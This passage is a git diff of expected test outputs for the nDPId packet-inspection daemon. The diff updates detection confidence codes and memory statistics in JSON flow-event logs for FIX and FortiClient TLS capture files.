{"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755116662,"flow_last_seen":1493755126832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":222,"flow_first_seen":1493755109242,"flow_last_seen":1493755131889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":9909,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109301,"flow_last_seen":1493755128771,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":40,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109654,"flow_last_seen":1493755129718,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":401,"flow_first_seen":1493755109264,"flow_last_seen":1493755132120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":8240,"flow_avg_l4_payload_len":20,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755111956,"flow_last_seen":1493755132007,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1493755110320,"flow_last_seen":1493755130355,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":647,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755113353,"flow_last_seen":1493755123449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":456,"flow_first_seen":1493755109301,"flow_last_seen":1493755132102,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":457,"flow_tot_l4_payload_len":14279,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1493755109440,"flow_last_seen":1493755131870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1493755110328,"flow_last_seen":1493755132019,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":920,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1493755117668,"flow_last_seen":1493755127687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755116662,"flow_last_seen":1493755126832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":222,"flow_first_seen":1493755109242,"flow_last_seen":1493755131889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":9909,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109301,"flow_last_seen":1493755128771,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":40,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109654,"flow_last_seen":1493755129718,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":401,"flow_first_seen":1493755109264,"flow_last_seen":1493755132120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":8240,"flow_avg_l4_payload_len":20,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755111956,"flow_last_seen":1493755132007,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1493755110320,"flow_last_seen":1493755130355,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":647,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755113353,"flow_last_seen":1493755123449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","packets-captured":1261,"packets-processed":1261,"total-skipped-flows":0,"total-l4-payload-len":37586,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":12,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":12,"total-idle-flows":12,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":75,"global_ts_msec":1493755132120} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1261/1261 @@ -81,9 +81,9 @@ ~~ total active/idle flows...: 12/12 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5942248 bytes -~~ total memory freed........: 5942248 bytes -~~ total allocations/frees...: 119431/119431 +~~ total memory allocated....: 6075882 bytes +~~ total memory freed........: 6075882 bytes +~~ total allocations/frees...: 122193/122193 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 453 chars ~~ json string max len.......: 676 chars diff --git a/test/results/fix2.pcap.out b/test/results/fix2.pcap.out index 05e95cf5b..77e13ed16 100644 --- a/test/results/fix2.pcap.out +++ b/test/results/fix2.pcap.out @@ -6,12 +6,12 @@ 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614758889589,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAweT0AAIAGAAAKZQACCmYACYiTBAAt1EIqAAAAAHACgAEU+AAAAgQFtAMDAQA="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614758889589,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"WgXZu6TVApXG95WRCABFAAAweT4AAIAGrLsKZgACCmUAAgQAiJIt1EL8LdQ\/KnASgAGE3gAAAgQFtAMDAQA="} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614758889589,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAoeT4AAIAGAAAKZQACCmYAAoiSBAAt1D8qLdRC\/VAQgAEU6QAAAAAAAAAA"} -00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614758889588,"flow_last_seen":1614758889589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614758889588,"flow_last_seen":1614758889589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614758889589,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"WgXZu6TVApXG95WRCABFAAAweT8AAIAGrLMKZgAJCmUAAgQAiJMt1EWWLdRCK3ASgAF\/OwAAAgQFtAMDAQA="} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614758889589,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAoeUAAAIAGAAAKZQACCmYACYiTBAAt1EIrLdRFl1AQgAEU8AAAAAAAAAAA"} -00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614758889589,"flow_last_seen":1614758889589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1987,"flow_first_seen":1614758889588,"flow_last_seen":1614758889595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":39543,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1614758889595,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1059,"flow_first_seen":1614758889589,"flow_last_seen":1614758889595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":28413,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1614758889595,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614758889589,"flow_last_seen":1614758889589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1987,"flow_first_seen":1614758889588,"flow_last_seen":1614758889595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":39543,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1614758889595,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1059,"flow_first_seen":1614758889589,"flow_last_seen":1614758889595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":28413,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1614758889595,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","packets-captured":3049,"packets-processed":3046,"total-skipped-flows":0,"total-l4-payload-len":67956,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1614758889595} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3049/3046 @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5962933 bytes -~~ total memory freed........: 5962933 bytes -~~ total allocations/frees...: 121166/121166 +~~ total memory allocated....: 6096567 bytes +~~ total memory freed........: 6096567 bytes +~~ total allocations/frees...: 123928/123928 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 672 chars diff --git a/test/results/forticlient.pcap.out b/test/results/forticlient.pcap.out index b53978662..e1f3122e8 100644 --- a/test/results/forticlient.pcap.out +++ b/test/results/forticlient.pcap.out @@ -4,42 +4,42 @@ 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1621067203571,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067203571,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFtKMutlmzOAAAAALAC\/\/9bnAAAAgQFtAEDAwUBAQgKJ6c8YwAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1621067203633,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067203633,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8pJBAADQGX3NSUS4NwKgBsijL8W1kEcpBrZZsz6ASOEBvHAAAAgQFrAQCCAoGP5CkJ6c8YwEDAwo="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1621067203633,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067203633,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFtKMutlmzPZBHKQoAQECzFugAAAQEICienPKAGP5Ck"} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067203571,"flow_last_seen":1621067203776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1621067203776,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01121{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067203571,"flow_last_seen":1621067203852,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1611,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1621067203852,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 